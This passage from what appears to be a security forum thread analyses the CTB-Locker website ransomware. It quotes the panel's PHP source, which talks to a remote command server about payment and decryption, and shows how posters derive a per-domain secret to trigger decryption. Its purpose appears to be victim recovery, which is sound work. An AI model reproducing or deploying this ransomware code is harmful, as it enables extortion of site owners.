socket_write($sock, $req, strlen($req));
$resp = socket_read($sock, 64);
if ($resp == "not_payed") {
echo json_encode(array("status" => "not_payed"));
} else {
echo json_encode(array("status" => "success", "decrypt" => $resp,
"dectest" => $dectest,
"secret" => substr(md5("djf33".$_POST["domain"]), 2, 10)));
}
} elseif (isset($_POST["sendmsg"])) {
$req = "snd";
socket_write($sock, $req, strlen($req));
$req = str_pad($_POST["domain"], 128);
socket_write($sock, $req, strlen($req));
$req = substr($_POST["msg"], 0, 2048);
socket_write($sock, $req, strlen($req));
echo json_encode(array("status" => "success"));
} elseif (isset($_POST["recvmsg"])) {
$req = "rcv";
socket_write($sock, $req, strlen($req));
$req = str_pad($_POST["domain"], 128);
socket_write($sock, $req, strlen($req));
$resp = socket_read($sock, 2048);
echo json_encode(array("status" => "success", "answer" => $resp));
}
socket_close($sock);
} elseif (isset($_POST["dectest"]) && secret_ok()) {
exit(json_encode(array(
"status" => "success", "dectest" => $dectest,
"secret" => substr(md5("djf33".$_POST["domain"]), 2, 10)))
);
}
Any luck getting the contents of 'crypt/AES.php' ?
Interesting function create_aes_cipher($keypass) .. just curious what he does with $keypass.
If we can get value of $keypass, here are the decrypt functions left in cbt-locker panel:
This php will get the 'secret' value that changes on each server domain/IP:
hxxp://cbt-locked-server.com/index.php?decrypt=<decryptionkey>&secret=<12345abc>
decrypted.PNG (22.12 KiB) Viewed 664 times
From the source:
Interesting function create_aes_cipher($keypass) .. just curious what he does with $keypass.
If we can get value of $keypass, here are the decrypt functions left in cbt-locker panel:
This php will get the 'secret' value that changes on each server domain/IP:
Code: Select all
Using the 'secret' value and $keypass, browse to the url on the server with the parameters:<?php
$d = isset($_SERVER["HTTP_HOST"]) && $_SERVER["HTTP_HOST"] != "" ?
$_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"];
define("cur_domain", $d);
echo $d;
$secret = substr(md5("djf33".cur_domain), 2, 10);
echo $secret;
?>hxxp://cbt-locked-server.com/index.php?decrypt=<decryptionkey>&secret=<12345abc>
Code: Select all
function secret_ok() {
$secret = substr(md5("djf33".cur_domain), 2, 10);
return isset($_GET["secret"]) && $_GET["secret"] === $secret;
}
//==============================================================================
if (isset($_GET['decrypt']) && secret_ok()) {
decrypt_files('allenc.txt', $_GET['decrypt']);
decrypt_files('test.txt', $_GET['dectest']);
exit('Congratulations! ALL FILES WAS DECRYPTED!!');
}Full package attached:
[Crypt]
AES.php
Base.php
BigInteger.php
Hash.php
Random.php
Rijndael.php
index.php
access.php
thx to nl3dee for the access.php part
[Crypt]
AES.php
Base.php
BigInteger.php
Hash.php
Random.php
Rijndael.php
index.php
access.php
thx to nl3dee for the access.php part
Attachments
infected
(77.84 KiB) Downloaded 131 times
(77.84 KiB) Downloaded 131 times